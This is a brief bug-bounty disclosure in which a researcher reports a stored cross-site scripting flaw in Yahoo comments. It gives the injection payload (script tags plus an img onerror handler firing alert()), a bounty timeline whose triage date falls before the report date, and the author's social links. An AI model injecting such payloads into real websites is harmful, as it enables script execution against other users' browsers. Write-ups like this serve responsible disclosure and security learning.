Stored XSS in Yahoo and all subdomains!

This is Hakim Bencella (H4kst3r) , and im from ALGERIA.

I always believed that sharing is caring, and i have been learning from multiple security researchers in the bug bounty field ,
Now, I am going to share with how I found Stored Cross-Site Scripting (XSS)

in Yahoo (all domains where you can post a comment)

Steps to Reproduce :

Go to https://www.yahoo.com/*

Comment this payload:

<script>alert();</script>”><<script>alert();</script>img src=x onerror=alert();>

ANDD YEEAAH :D

Here is the video PoC:

Timeline :

27/11/2017— Initial Report.

30/10/2017 — Triaged + initial reward 300$

23/02/2018 — Bug Resolved. + $1200 bounty rewarded. ( Total $1500 )

/H4kst3r :

https://hackerone.com/H4kst3r

https://www.instagram.com/i.c0de/

https://twitter.com/H4kst3r

https://facebook.com/H4kst3r